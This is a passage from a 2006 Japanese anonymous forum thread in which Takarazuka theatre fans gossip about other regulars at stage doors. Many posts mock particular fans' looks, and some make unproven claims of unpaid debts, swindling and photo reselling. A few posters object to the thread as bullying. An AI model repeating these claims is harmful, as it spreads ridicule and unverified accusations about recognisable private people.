大荷物でまわってるんじゃない?
公園で寝泊りしてるとか

私は東京なんだけど
鳥女さんはずっと東京の人と思ってた
大劇の楽でみかけてびっくり

ここのカキコみるとどうも大劇公演中は
ムラに住み込み?

163 :名無しさん@花束いっぱい。:2006/11/05(日) 01:23:40 ID:zTvD95RM
自分は鳥女さんはムラ側の人間だと思ってたよ・・・

164 :名無しさん@花束いっぱい。:2006/11/05(日) 02:09:12 ID:NIf5IxkI
ムラにもマンションかりてるんだよね。すごいね。


165 :名無しさん@花束いっぱい。:2006/11/05(日) 02:10:37 ID:M0M9aJWw
楽のパレードってガードする場所が1人ずつ決まってたみたいだね。
鳥女の場所がそんなにいい場所じゃなかった…。
スタッフもよく分かってる…ww

166 :名無しさん@花束いっぱい。:2006/11/05(日) 10:32:20 ID:cYEWd9d7
ねぇ、彼女悪目立ちしてると思うけど、しつこくネットに書くのはやめたら?古くから宝塚の大ファンで、宝塚にお金使って暮れているんだよ!人との関わりで何かごたごたがあるのはどの人も一緒でしょ?しつこく書くのはどうかと思うよ。

167 :名無しさん@花束いっぱい。:2006/11/05(日) 10:36:03 ID:03ikGOZv
お金にルーズだから。楽にいってガードしている暇があるなら、
借りたままになっているお金払えと言いたい。
東京に来たらコム会も追い出されると思う。直訴するていってたから。

168 :名無しさん@花束いっぱい。:2006/11/05(日) 10:59:26 ID:HeTsVcre
ネット見てる人って意外に多くないんかな?
鳥女に今でも引っかかってる人見ると正体教えてあげたくなっちゃう。

>166
ごたごたって言っても、鳥女の場合はマジで犯罪だろう!?と思うくらいひどいからね…。

169 :名無しさん@花束いっぱい。:2006/11/05(日) 11:01:13 ID:cYEWd9d7
こんな所に書くより本人に言えばいいじゃない〜。それにお金のやりとりはお互いの自己責任だよ!ネットで欝憤バラシはイクナイ!

170 :名無しさん@花束いっぱい。:2006/11/05(日) 11:12:17 ID:03ikGOZv
本人にいっても聞かないでしょ。それで長いことすごしてきたんだから。
ここみて、引っかからない人が少しでも増えればいいかなと思う。
詐欺師みたいに口がうまくて、ご贔屓が一緒だとつい心を許して
気がついたときは・・・ていう感じ。

171 :名無しさん@花束いっぱい。:2006/11/05(日) 17:19:49 ID:O6ZKKAY1
>>166
そんなに正義感溢れる心を持っているなら
正義感に欠ける私たちの代わりに、鳥女にここに書いてあることを直訴して下さい。

私はここで鳥女を知っていたおかげで引っかからずに済んだよ。

172 :名無しさん@花束いっぱい。:2006/11/05(日) 18:21:01 ID:Vt8qcOdh
「なっちゃん」花の道じゃぁ有名人・・・・なんだ。
最近〜舞台だけにしてるから「鳥女」の存在など知らなかった。





173 :名無しさん@花束いっぱい。:2006/11/05(日) 22:03:37 ID:cYEWd9d7
>>171
だからさ、私はあの人の事昔から顔
は知ってるけど、知り合いじゃないし
何にもかかわり合いないもの。
本人に言う事なんて何も無い。
あの人が何をしてるのかしらないけど、
何かトラブルがあったならこんなとこで
しつこく書き込みなんてしないで本人に
言えば?それに何かのやりとりはそれぞれ
自己責任でしょって?
ましてや何にも関わりの無い人が興味本位で
人の容貌についてこんなとこに書くものでは
ないよ!

174 :名無しさん@花束いっぱい。:2006/11/05(日) 23:34:51 ID:d/X4bkp2
>173
どこを縦読み?

175 :名無しさん@花束いっぱい。:2006/11/06(月) 00:28:40 ID:AQwasGtK
鳥女テラキモス

176 :名無しさん@花束いっぱい。:2006/11/06(月) 02:26:27 ID:kMB5MQjG
>>173
キチ○イさんですか?

177 :名無しさん@花束いっぱい。:2006/11/06(月) 22:39:19 ID:OlBMshHA
本人?

178 :名無しさん@花束いっぱい。:2006/11/06(月) 23:30:37 ID:FYKj03Bt
他人の容姿のことを、こんなところに書き込んで笑いものにする連中は人間のくず。
こんなやつらがいるから、「いじめ」がなくならないんやな。

179 :名無しさん@花束いっぱい。:2006/11/06(月) 23:35:22 ID:+15NIQPv
それはそうなんだが、あの節操のない応援のしかたが改まらない限り
彼女への嫌悪感は減らないだろうな。
来年、いったいどこの会に所属するんだろうか。

180 :名無しさん@花束いっぱい。:2006/11/07(火) 00:38:51 ID:ukD9lmxE
またミズ会にもどるとか、鳥女。追い出されたから無理か!

181 :名無しさん@花束いっぱい。:2006/11/07(火) 00:47:06 ID:rLPYEEqB
鳥女さんって、どんな会を渡り歩いてきたの?
パレルモやアパシネの時見かけたから花組(ゆみこ?)のファンなんだと思ってた…
TCAの時、コム会服来て、携帯待受もコムオスカルにしてるのを見て、へぇ〜って思ったの。
私自身そんなに通ってるわけじゃないのに遭遇率が高いんだよね…

182 :名無しさん@花束いっぱい。:2006/11/07(火) 00:47:40 ID:HAYX73rY
だからさほっときなよ!

183 :名無しさん@花束いっぱい。:2006/11/07(火) 01:31:36 ID:Sk9MfKFM
>182
アナタがほっとけばいいのでは?w
容姿を悪く言うのは確かに如何なものかとは私も思うが、
ここで話題に出るのは仕方ないでそ。

スレタイ読んでね。

184 :名無しさん@花束いっぱい。:2006/11/07(火) 05:19:13 ID:nG5ZRVyP
そもそも、このスレに何の意味があるのさ。
人権侵害の糞スレじゃない。

185 :名無しさん@花束いっぱい。:2006/11/07(火) 05:28:13 ID:Us0/bhZY
こんところで吠えててもなんだし、削除依頼でも出してきたら?

186 :名無しさん@花束いっぱい。:2006/11/07(火) 09:30:33 ID:9C5jKGAf
鳥女さんって,誰からも注意や助言などをして貰えない人なの?
一匹狼でFCを渡り歩く事が出来るって余程強い方なんでしょうね。
(まぁ強いのか?鈍感なのか?わかりませんが・・・・)
なにはともあれ有名人なんですね。


187 :名無しさん@花束いっぱい。:2006/11/07(火) 11:25:34 ID:ZbF8Ck+4
鳥さんと仲良くなりました。

188 :名無しさん@花束いっぱい。:2006/11/07(火) 16:37:59 ID:0sqgP4UP
鳥さんって、横顔に特徴ある方ですかね?たまに行くと必ずお見かけします。会の方と楽しくお話してますよね

189 :名無しさん@花束いっぱい。:2006/11/08(水) 21:06:53 ID:yS8w0Ylq
166=177=182

本人だと言われても仕方ない発言だね。
本人じゃないにしてもあなたこそほっておけばいい。

190 :名無しさん@花束いっぱい。:2006/11/08(水) 22:32:43 ID:QU3M6HJR
このスレ読んでると、いじめをする人は、いじめられる人の心の痛みを、本当にわかってないんだなということがよくわかるよ…

191 :名無しさん@花束いっぱい。:2006/11/08(水) 22:42:21 ID:EQHqlH6H
いじめられる人は、本人にそれなりの原因があり、かつ改善可能である場合にも、わかろうともしないことが多いんだよね…

192 :名無しさん@花束いっぱい。:2006/11/09(木) 00:49:07 ID:7CPOt45q
↑某アンケート公立小学生六年男児と似たようなコメント
=幼稚
わかる?


193 :名無しさん@花束いっぱい。:2006/11/09(木) 02:09:07 ID:ZM7p2sZ9
いじめられても通うくらい図太い神経してるなら、問題ないんじゃない?
宝塚は趣味の世界なんだから、イヤならいつでも逃げ出せる。
実際人間関係がこじれて消えていく人って多いよね。

194 :名無しさん@花束いっぱい。:2006/11/09(木) 11:40:00 ID:rasqNu7N
>191
いじめられる人にも原因があるって
世間でよく言われるけれど・・・
結局イジメをする人が悪いんだよ。
テレビでも言ってた。

195 :名無しさん@花束いっぱい。:2006/11/09(木) 13:46:45 ID:jLKSccJ9
背が低くて白髪で一見男か女かわからなくて最近上は赤い服。
この人がなっちゃん?

196 :名無しさん@花束いっぱい。:2006/11/09(木) 16:13:38 ID:yiDMP90W
なんつーかコメント内容の是非はともかく
小六男児=幼稚 的な論法にビクーリ

197 :名無しさん@花束いっぱい。:2006/11/09(木) 22:22:15 ID:Qv7XR4NH
>>195
それがなっちゃん。

198 :名無しさん@花束いっぱい。:2006/11/09(木) 23:06:29 ID:EsqzRpEh
なっちゃんってずっと変わらないね。
10年くらいヅカを離れてて、久しぶりにあの姿を見かけた時は、ナツカシ〜って思ったよ。

199 :名無しさん@花束いっぱい。:2006/11/10(金) 01:03:29 ID:V79EMxh0
>>197
ありがとうございます!
すっきりしましたw

200 :名無しさん@花束いっぱい。:2006/11/10(金) 22:03:26 ID:QLng7EsA
最近、てつあ○かいる??

201 :名無しさん@花束いっぱい。:2006/11/10(金) 22:58:27 ID:EIaqHyWs
そのコメント、新聞で4だキガス。いじめはその人の個性とか言ってるヤツジャネ?

202 :名無しさん@花束いっぱい。:2006/11/11(土) 01:01:50 ID:ECIvKbOt
て○あやかさん、ミズさんの入りを望遠鏡みたいなカメラで撮ってた。

203 :名無しさん@花束いっぱい。:2006/11/11(土) 12:51:33 ID:aDslBxXO
>191 それは井島をしてる人が自己の行動を正当化しようとする言い訳というか、単なる屁理屈で、いじめをしていい理由にはならない。

204 :名無しさん@花束いっぱい。:2006/11/11(土) 15:08:22 ID:6goYQc3r
てつあ〇かさん、うたかた?のツアーバッグ持ってた?

205 :名無しさん@花束いっぱい。:2006/11/12(日) 00:48:03 ID:ZcpFJayN
>202
それもみんな痛いミズファンTの為。

206 :名無しさん@花束いっぱい。:2006/11/13(月) 19:15:47 ID:25PJpYfi
>204
雪公演の頃は月のツアーバッグ持ってた。


207 :名無しさん@花束いっぱい。:2006/11/13(月) 23:33:48 ID:PjxO+VaH
ツアーバック、ちょっとしたブームだね!誰のファンかを推測するの楽しい〜。小さな内ポケットつけて欲しい

208 :名無しさん@花束いっぱい。:2006/11/14(火) 00:45:01 ID:4w1Jjjd2
なっちゃんはコパカのツアーバック持ってました。

209 :名無しさん@花束いっぱい。:2006/11/14(火) 07:54:20 ID:l/1MK4xC
常連の人にツアーバックは好評みたいですね。
小さい方が人気とか

210 :名無しさん@花束いっぱい。:2006/11/14(火) 10:13:36 ID:BNeTMGmu
そう、小さいのは使える。たかちゃんのウイングのはデザインもおとなしくて、重宝してます

211 :名無しさん@花束いっぱい。:2006/11/14(火) 14:21:04 ID:Ve1FzygJ
ツアーバックに小ってある?
ワンサイズじゃないの?

212 :名無しさん@花束いっぱい。:2006/11/14(火) 20:53:44 ID:IMRYeZhx
何かツアーバックのイメージダウンだな

213 :名無しさん@花束いっぱい。:2006/11/16(木) 19:04:34 ID:gK+MoFjk
ツアーバック、大しか見たことないけど。小も売ってるみたい。
わおさんのは、オークションですごく高くなっているのを見た気が・・

214 :名無しさん@花束いっぱい。:2006/11/16(木) 22:36:12 ID:k7ZArJPn
カメラぶら下げた女うざい

215 :名無しさん@花束いっぱい。:2006/11/16(木) 23:15:33 ID:+3hAPBvc
>>214
その人って若いですか?

216 :名無しさん@花束いっぱい。:2006/11/18(土) 07:35:01 ID:6RueNLqC
もういるよ。でまたいくよ。

217 :名無しさん@花束いっぱい。:2006/11/18(土) 21:51:25 ID:IrhU0gXz
今日、鳥女さんの斜め後ろに並んぢゃった!

218 :名無しさん@花束いっぱい。:2006/11/18(土) 22:18:08 ID:x90maWZK
よく、てつあ○かと一緒にいる人?

219 :名無しさん@花束いっぱい。:2006/11/18(土) 22:29:00 ID:6RueNLqC
イメチェン

220 :名無しさん@花束いっぱい。:2006/11/18(土) 23:29:37 ID:Gp24sCpH
誰の話なの?

221 :名無しさん@花束いっぱい。:2006/11/21(火) 07:01:20 ID:HxmWVAmZ
鳥さん、東京にいるんですよね〜

222 :名無しさん@花束いっぱい。:2006/11/21(火) 21:19:19 ID:zqITzh8W
222

223 :名無しさん@花束いっぱい。:2006/11/21(火) 23:25:35 ID:iuIbLdko
ムラのかし会にいる粘着オバサン。
かしママに頼まれたといって募金募ってるらしいよ


224 :名無しさん@花束いっぱい。:2006/11/22(水) 00:05:26 ID:74iCLIX0
>223
それってやばくないか?


225 :名無しさん@花束いっぱい。:2006/11/22(水) 00:22:42 ID:VV1qNEYY

8ネタで話題になってるね

226 :名無しさん@花束いっぱい。:2006/11/22(水) 00:28:15 ID:/lgzKtxb
>223
8FCスレでママが毎日花の道にいるって妄想話してたなりすまし粘着安置だよね。
嘘がばれたから2にお引っ越しして自演かぁ。
同じ内容だし。

ついでに言っとくと、退団用資金集めを会で集ったり、会とは別におばさま(お客様)のグループが生徒の為に集めることはヅカでは今まで他でもあったよ。

227 :名無しさん@花束いっぱい。:2006/11/22(水) 23:45:52 ID:DB5Cvt/B
いやいや、妄想ではないですよ。
かしママが初日の入りに、花の道時計の横のベンチに
かしパパと仲良く座っていたのは事実ですよ。
次の日は、花の道の電話ボックスがある辺りのベンチに、かしパパが
座っていて、少し離れているベンチに、かしママが座っていましたよ。
見かけたのは、この2日間だけですけど。

228 :名無しさん@花束いっぱい。:2006/11/22(水) 23:50:10 ID:k/0U0LFv
自演ってここの事か。
あんたのバッシングはしても、かしげのバッシングなんかするか。
お前じゃあるまいし。

229 :名無しさん@花束いっぱい。:2006/11/22(水) 23:55:41 ID:d0j1EU4W
/lgzKtxbよもやまじゃなくて真性かしげファンだったのか?
他のかしげファンに迷惑だって考えた事ないの?
もしかして、あの変なのを頭に付けろって強制したおばさん?




230 :名無しさん@花束いっぱい。:2006/11/22(水) 23:59:38 ID:69aXBm46
かしげアンチにネタ提供するなんて・・最悪。

231 :名無しさん@花束いっぱい。:2006/11/23(木) 00:06:54 ID:fyKdO79e
>227
初日から「毎日」って書かれ方したからでしょ?
初日から2週間以上たった頃に「毎日」って書かれたら、ずっといたってことになっちゃうじゃない。
さすがにそれはないでしょう。

232 :名無しさん@花束いっぱい。:2006/11/23(木) 00:14:37 ID:s6Cyiah2
かしげファンってくだらない事に突っかかるんだね・・ナゼ?
お金はあったほうが良いに決まっているし、実家がそれを払えるのは幸せな
事じゃない?サヨナラ公演に親が見に来てても別に構わないじゃん。人気だって
あれば長期って限らないのは轟さんを見ればはっきりしている。
たかこママだって似たようなことをしてたんでしょ。
そんなことよりFRAU外された事を真面目に考えた方が
良いんじゃないの?トップなのに外された・・大きな問題だと思う。

233 :名無しさん@花束いっぱい。:2006/11/23(木) 00:19:49 ID:Jg6rfKVz
どうでもいいけどスレタイくらいは読めるようになってから来てね

234 :とんちんかんなこいつに家:2006/11/23(木) 00:26:38 ID:YnzJtVDi
226 :名無しさん@花束いっぱい。:2006/11/22(水) 00:28:15 ID:/lgzKtxb
>223
8FCスレでママが毎日花の道にいるって妄想話してたなりすまし粘着安置だよね。
嘘がばれたから2にお引っ越しして自演かぁ。
同じ内容だし。

ついでに言っとくと、退団用資金集めを会で集ったり、会とは別におばさま(お客様)のグループが生徒の為に集めることはヅカでは今まで他でもあったよ。


235 :名無しさん@花束いっぱい。:2006/11/23(木) 00:35:31 ID:fyKdO79e
同じスレ内で一度に確認できる位置の内容をわざわざコピペする234の行動の意義がわからない…

236 :名無しさん@花束いっぱい。:2006/11/24(金) 08:34:59 ID:ssbf8IwN
てつ○やかは、雪組の愛原実花のファンなのに
なぜ東京に行かずにムラで写真撮り続けているのでしょう?
新公やお茶飲み会があれば行くのかな?


237 :名無しさん@花束いっぱい。:2006/11/24(金) 20:20:56 ID:zY+eCIKB
宙2会の背の小さいパタリロみたいな子って会辞めたの?

238 :名無しさん@花束いっぱい。:2006/11/24(金) 20:40:38 ID:j+/rQzAP
なんで?

239 :名無しさん@花束いっぱい。:2006/11/24(金) 21:55:49 ID:eu5+qqXe
>237
パタリロみたいな子っていうので、すぐあの人だってわかったw
前、門のとこで友達にメールしてたらチケットいりませんかって
声かけられた事あったよ。顔も個性的だったし今でもはっきり
思い出せるw

240 :名無しさん@花束いっぱい。:2006/11/25(土) 00:59:13 ID:91+ddhjj
今日、宙組新公トークショーに、て〇あや〇さん来てた

241 :名無しさん@花束いっぱい。:2006/11/25(土) 13:10:58 ID:pQYv0toq
237>パタリロみたいな子辞めたみたいだよ〜多分。
宙2入ってないのに花の道にいるのを見たから

242 :名無しさん@花束いっぱい。:2006/11/25(土) 13:15:33 ID:ZB8SOr1c
スイマセン、パタリロってなにですか?

243 :名無しさん@花束いっぱい。:2006/11/25(土) 18:47:12 ID:4O9qH52N
パタリロ…
実にわかりやすい例えだ。

ちなみにパタリロとは
http://www.toei-anim.co.jp/tv/patalliro/

244 :名無しさん@花束いっぱい。:2006/11/25(土) 22:21:30 ID:D9Zwi+fW
243>パタリロを実際に見たら想像以上に似ててビックリした。
確かにこんな子だったな〜

で、ホントに辞めたの?
辞めそうな子じゃないな〜と以前花の道から見ていたのだが…

245 :名無しさん@花束いっぱい。:2006/11/26(日) 22:09:00 ID:sjiJvxkE
パタリロ、最近宙2の入出のスタンバイの中にいないよね。
よく花の道嬢とつるんでるのは見かけるけど。

246 :名無しさん@花束いっぱい。:2006/11/26(日) 22:46:20 ID:a0NtJ2vW
花の道嬢も最近見ないよねー。

247 :名無しさん@花束いっぱい。:2006/11/27(月) 08:37:10 ID:SusT52B9
鳥女は東京でみますか?

248 :名無しさん@花束いっぱい。:2006/11/27(月) 20:52:36 ID:V+C96YTD
先週末はいましたね。

249 :名無しさん@花束いっぱい。:2006/11/27(月) 23:59:05 ID:6ePJwi6Z
今日、鳥女コム会の一列めに並んでるの見たよ。

250 :名無しさん@花束いっぱい。:2006/11/28(火) 01:53:44 ID:ineY/YMw
コムも鳥女の顔だけは覚えてるんだろうな。

251 :名無しさん@花束いっぱい。:2006/11/28(火) 16:51:48 ID:Z36TrtOz
ミズもゆみこもね。

252 :名無しさん@花束いっぱい。:2006/11/29(水) 08:00:26 ID:wyn8yhAD
コム会のムラで毎日見かけていた年齢不詳の彫りの深い長い顔の人を先週日比谷で見かけた。
そして一列目で観劇していた。

253 :名無しさん@花束いっぱい。:2006/11/29(水) 09:07:03 ID:86PK6yyy
水会からゆみこ会…コム退団後どうするか?
雪に留まるのかね?


254 :名無しさん@花束いっぱい。:2006/11/29(水) 10:44:37 ID:ohHlvYOl
たしか・・あさこちゃんも好きだったはず

255 :名無しさん@花束いっぱい。:2006/11/29(水) 18:05:21 ID:wG3H5Wml
て〇あ〇かさんてどんな方?
金髪で小太りで眼鏡かけた中年のおじさんですか?

256 :名無しさん@花束いっぱい。:2006/11/29(水) 22:20:32 ID:zaxB5LV5
わかってるやん。

257 :名無しさん@花束いっぱい。:2006/11/29(水) 22:55:04 ID:M8uizuR4
わかりやすいよね

258 :名無しさん@花束いっぱい。:2006/11/30(木) 21:17:51 ID:KQW9xmtE
見たことないけど東宝にいる?

259 :名無しさん@花束いっぱい。:2006/11/30(木) 22:02:29 ID:UAX+t6cJ
だいたいムラでしょ?ムラで見ない日ないぐらいいるよね

260 :名無しさん@花束いっぱい。:2006/11/30(木) 23:06:37 ID:KQW9xmtE
ムラかぁ。東宝は有名な方はあまりいないですね

261 :名無しさん@花束いっぱい。:2006/12/01(金) 00:05:19 ID:tuz8xiZ+
東京には汚い親子(?)がいるよね。
母親らしき人は、白髪混じりの長い髪で
太っていて背が低目で、独り言がうるさい。
娘みたいな人は、これまた伸ばしっぱなしの汚い黒髪で
謎なセンスの服(よれよれTシャツにフリフリスカートとか)着てる。
うるさいし目障りだから、
見かけたら自分はその場を離れる事にしてる。

262 :名無しさん@花束いっぱい。:2006/12/01(金) 02:17:50 ID:JIXEXyA5
太ってる独り言がうるさい人は、母親じゃないよ。
母親はわりと細くてよぼよぼした感じの人。
娘は、樹里ファンだった。
その親子に「おばちゃん」と呼ばれている人も、親子とつるんで、人から依頼を受け当日券並んでる。
ほぼ全組の当日券に先頭で並んでいる。


263 :名無しさん@花束いっぱい。:2006/12/01(金) 07:57:54 ID:wHAF6MFV
昨日、コム会の後ろで入りを見てたらそのいつも入りにいるちまい婆さんの
近くに立っちゃってうるさくてすっげー苛立った。
自分は人押しのけまくるのにちょっと他人がふれたらうるさいのなんの。

そしてそんな日に限ってコムが遅め…

264 :名無しさん@花束いっぱい。:2006/12/01(金) 11:43:05 ID:xd1scNqw
東京はて○あ○かさんほど目立たないけど、入出の写真を撮ってオクで荒稼ぎしてる人が結構いる。

265 :名無しさん@花束いっぱい。:2006/12/01(金) 12:14:35 ID:7orWuk8S
最近て○あ○かさん写真売ってる??

266 :名無しさん@花束いっぱい。:2006/12/01(金) 15:07:29 ID:l022T/zc
その娘、カラーセンスも怪しいよね
黄緑スカートに今時珍しめなショートブーツとか

んで本当に声でかくてうっるさい

267 :名無しさん@花束いっぱい。:2006/12/01(金) 18:49:50 ID:5Lrl/AwV
>>262
母親じゃないんだ!びっくりだー
似たもの親子wとか思ってた。
あんなに煩くて不潔っぽくて、滅茶苦茶うさんくさい人達に
当日券頼む人って、不安じゃないのかな。
今度当日券に並びたいと思ってたけど、遭遇したら嫌だな。
前にサバき待ちしていたら、目の前で
「サバきなんて出るわけない。待ってる奴は馬鹿だ」
と言われてヘコんだorz
出待ちの時にも、自分の贔屓の事をけなしているのが
聞こえてしまった……orz

268 :名無しさん@花束いっぱい。:2006/12/01(金) 20:57:21 ID:gCUA4YGc
遭遇してしまうと、というか、たいてい遭遇してしまい、
あまり気持ちの良いものではないけれど、
彼女らの為に、せっかくの並びが出来ないと思う方が、
悔しいから、時間のあるときは並んでいます。
ひたすらに本を読んだり音楽を聴いたり、
一人の世界に入れば大丈夫。諦めないで!

269 :名無しさん@花束いっぱい。:2006/12/01(金) 21:20:27 ID:jz3lv4C5
その髪長の人は当日券の先頭に並んで毎回観るの?

270 :名無しさん@花束いっぱい。:2006/12/01(金) 22:10:50 ID:xd1scNqw
な○ちゃんは宙組のファンになるんだろうか…

271 :267:2006/12/01(金) 23:15:44 ID:R7vT3MSf
ありがとうございます。
>>268さんのように、心に余裕を持って
大人になれたら…と思います。
入り出も嫌な人ばかりじゃないよね。
マナーがきちんとしている人もいるし。


272 :名無しさん@花束いっぱい。:2006/12/02(土) 01:12:31 ID:/4i7ZlZ+
もうすぐ貴コン…ピンハをまたみることになる…そしてまたスタッフ気取りになってみんなを仕切り、時には会員を怒鳴り…嫌味をいう。そんな光景をまたみるのかorz

273 :名無しさん@花束いっぱい。:2006/12/02(土) 01:43:11 ID:4r5Q6Inh
その東京で有名な親子、ムラにもたまに来てるよね??


274 :名無しさん@花束いっぱい。:2006/12/02(土) 08:02:52 ID:w5VijChm
>>270
なるんじゃない?
あの人どこにでも現れるし


275 :名無しさん@花束いっぱい。:2006/12/02(土) 23:40:20 ID:+nAbmeTW
偶然にも鳥女さんの近くになっちゃって、会話が聞えてきだんだけど
いかに、自分が顔が広いか、人から好かれているか、生徒さんが自分を見てくれるか
そんな話しばっかりだった 自覚ないんだねぇ・・・

276 :名無しさん@花束いっぱい。:2006/12/03(日) 01:12:09 ID:yvDhIClE
>>275
「そりゃー、その顔じゃ見ちゃうよねw」
って誰か言ってくれないかな。

277 :名無しさん@花束いっぱい。:2006/12/03(日) 10:49:47 ID:N3wrZMse
>>272
その人って髪ソバージュ、背低く少し小太り、50〜60代の肌黒くシワ多い人?
黒字に小花模様のワンピース。
ネバで前方で隣だったけど爆拍手してすごいこっちを睨んできてコワかった・・

278 :名無しさん@花束いっぱい。:2006/12/04(月) 19:17:02 ID:6He7ethr
>275
あぁ!その人はジジですっ!ジジとは、レビュー伝説のジジのことですが、ジジの誕生日パーティーの場面のジジの髪形を真似てよく入り出してたので…自然とそのような名前がついた方です。
ピンハの仲間です。

279 :名無しさん@花束いっぱい。:2006/12/04(月) 19:19:18 ID:6He7ethr
↑失礼。>277へです

280 :名無しさん@花束いっぱい。:2006/12/04(月) 21:59:16 ID:r1b+bavw
OGの入り出なんて、そのOGファンしか見ないんだから
別館でもファンサイトでも隣板ででもやれよ。
どうしてタカコファンはいつまでもいつまでもヅカスレに執着するんだ。

281 :名無しさん@花束いっぱい。:2006/12/04(月) 23:28:04 ID:JB2aaUpf
常連ファンで痛くない人なんていたら教えて頂きたい

282 :名無しさん@花束いっぱい。:2006/12/06(水) 00:04:00 ID:tbCJlyk5
>>281
たくさんいるけど、痛くないから教えようもない。

283 :名無しさん@花束いっぱい。:2006/12/06(水) 23:27:59 ID:Y0YXpAkU
>282
愛してる!

284 :名無しさん@花束いっぱい。:2006/12/08(金) 02:06:43 ID:DBLREblA
>276
ワロス

285 :名無しさん@花束いっぱい。:2006/12/08(金) 18:00:10 ID:Sh20z6W5
最近てつ○や○がオクで写真売らなくなったねー
なんかあった?

286 :名無しさん@花束いっぱい。:2006/12/08(金) 21:02:17 ID:TIN39d4n
私も不思議。派手にやってたから何か警告とかされたのかな。

287 :名無しさん@花束いっぱい。:2006/12/08(金) 21:16:39 ID:rJ/sv50l
それで結局パタリロさんは会辞めたの?

288 :名無しさん@花束いっぱい。:2006/12/08(金) 21:43:36 ID:U5fvGMOd
>285
改名したのかと思ってた。
違う人なのか…

289 :名無しさん@花束いっぱい。:2006/12/08(金) 21:48:31 ID:TiR5PJnz
塚雀 ってヒト?

290 :名無しさん@花束いっぱい。:2006/12/08(金) 21:49:03 ID:Cg0PbUu5
写真は撮ってるよね。売らないんだったら何のために撮ってるんだか

291 :名無しさん@花束いっぱい。:2006/12/08(金) 21:58:48 ID:QcIwOEhr
>289
壮。

292 :名無しさん@花束いっぱい。:2006/12/08(金) 22:21:18 ID:MTSwm/7Z
て●あやか=づか●ずめじゃない?

293 :名無しさん@花束いっぱい。:2006/12/08(金) 22:25:04 ID:QcIwOEhr
>292
だーからーそうだってば!!

294 :名無しさん@花束いっぱい。:2006/12/09(土) 13:11:05 ID:Ci5Vnsg/
なるほど!

295 :名無しさん@花束いっぱい。:2006/12/11(月) 13:22:40 ID:2WSl3Ajm
>281
コム会スタッフ(むら)は他の組のトップ会と比べてレベルが高いような希ガス

296 :名無しさん@花束いっぱい。:2006/12/11(月) 13:47:14 ID:ugK6blhu
>>295
私も前から思ってた。
私はたまに入り出見たりするけど、
他のトップ会よりも綺麗な人多いよね。

堕天使のお稽古中も公演中にも見たんだけど、
ガードの後ろのほうで会員並べてる若いスタッフ。
すごく可愛かったよ〜

297 :名無しさん@花束いっぱい。:2006/12/12(火) 15:18:23 ID:Er2CcSM+
コム会むらのスタッフがレベル高い???それはとても否定したい。
言ってるのは多分むらのお手伝いと言われる人でスタッフではないですよ。
東宝でもよく見かけるし、昨日も今日も東宝入り出にいた。

298 :名無しさん@花束いっぱい。:2006/12/13(水) 17:39:21 ID:LOiq3DBo
え〜レベル高いかぁ?
容姿はともかく、あそこの会のスタッフはやってること最悪じゃん。

299 :名無しさん@花束いっぱい。:2006/12/13(水) 23:29:06 ID:ubPVMtIw
やってるの?ナニをー?

いつ行っても必ずいるそら豆顔のスタッフ
過度の作り笑顔にこちらが笑えない
滲み出る陰気さからいって、やってること本当に最悪そう。

300 :名無しさん@花束いっぱい。:2006/12/14(木) 22:40:29 ID:fq7EluMY
>>299
そら豆顔のスタッフってコムさんがいらっしゃったらいつも
「おはようございます」って会員より先に言ってますよね?

あの人なら、作り笑顔がすごいけど、すごく優しそうじゃん!!


>>298
コム会のやってる事気になる!何やってんの?

301 :名無しさん@花束いっぱい。:2006/12/21(木) 14:39:30 ID:wHmg+quQ
そのお手伝いさんは東宝の方じゃなかったんですね。
自分は東宝だけど、私が入りに行く時はよく見かけたので東京の方だと思ってました

そら豆顔のスタッフって東宝?見てみたいw

302 :名無しさん@花束いっぱい。:2006/12/21(木) 19:05:54 ID:mzujzDKn
そら豆顔のスタッフ…?
明日探してみよっとw

303 :名無しさん@花束いっぱい。:2006/12/21(木) 22:06:42 ID:Uk/lYTo1
夜のフラッシュ撮影はダメつーからデジカメの動画で撮ってたら、そら豆の人に邪魔された。お陰様で映像はそら豆の頭と声ばかり。ちゃんと並んでたのに!生意気だ!そら豆!


304 :名無しさん@花束いっぱい。:2006/12/21(木) 22:23:45 ID:aqMkY7gg
そら豆さんってムラでも東宝でも常にいるよね?偉いのあの方?

305 :名無しさん@花束いっぱい。:2006/12/21(木) 23:40:01 ID:DV6wjEWD
雪組の桜寿ひらりさんだっけ?その人に入り浸り(?)の太ったおばさんが、星組のみやるりにも付いてる。東宝ね。このおばさん、同期なのによくやれるよね。

306 :名無しさん@花束いっぱい。:2006/12/22(金) 00:13:21 ID:Qd39g1OJ
その人って、宙にも着いてない?

307 :名無しさん@花束いっぱい。:2006/12/22(金) 01:00:11 ID:VJnycnc0
まぢ?宙は知らないなぁ。

308 :名無しさん@花束いっぱい。:2006/12/22(金) 11:07:12 ID:ojYRnZ2F
そら豆さんがわからない。。。
顔がぱんぱんで丸い人かなぁ??

309 :名無しさん@花束いっぱい。:2006/12/22(金) 13:22:57 ID:C+tBNCb/
そら豆さん優しかったよ〜
分からない事があって、質問したら親切に教えてくれた
ちょっと大阪弁混じりな標準語だった。
毎日のように東宝に通うってことは結構金持ちなの?
でも金持ちそうな顔じゃない・・・

310 :名無しさん@花束いっぱい。:2006/12/22(金) 21:36:06 ID:Qd39g1OJ
>307
人違いでした、すいません。
つい、みやるりに反応してしまったので。

311 :名無しさん@花束いっぱい。:2006/12/22(金) 22:37:27 ID:rfAVGWLt
みやるり東宝に太ったおばさんなんか付いてないよぉ〜

312 :名無しさん@花束いっぱい。:2006/12/22(金) 23:29:51 ID:VJnycnc0
いるよ、見たから。桜寿さんにはついてる。お茶のみをするべく盛んに声かけてた

313 :名無しさん@花束いっぱい。:2006/12/23(土) 01:23:39 ID:WvnpHxeS
そら豆さん、可愛くない?!
堕天使東京お稽古の時か大劇場公演中の入りの時に会員に説明?しながら飛び跳ねてた
すっごい笑顔だったし

>>309
そら豆さんは背が低いほうで、常に笑ってる(笑い顔してる)人ですよ
髪の毛は黒色でセミロング
顔は・・・ぱんぱんかな?でもすごく痩せている方だと思いますよ

314 :名無しさん@花束いっぱい。:2006/12/23(土) 17:55:25 ID:P0RTUWNa
そら豆さん、可愛いとは思わないけど性格は良さそうな
感じがする。確かに、いつも笑ってるよね。

315 :名無しさん@花束いっぱい。:2006/12/23(土) 22:02:17 ID:Lj51bERo
パタリロさん、宙2会をクビになったらしい。


316 :名無しさん@花束いっぱい。:2006/12/23(土) 23:59:31 ID:vjeP+kjd
何したの?

317 :名無しさん@花束いっぱい。:2006/12/24(日) 05:52:38 ID:rlMVjoxu
鳥女発見


318 :名無しさん@花束いっぱい。:2006/12/25(月) 02:12:37 ID:ZeX/f2zC
鳥女さん、今度はどこの会に流れるのかな…

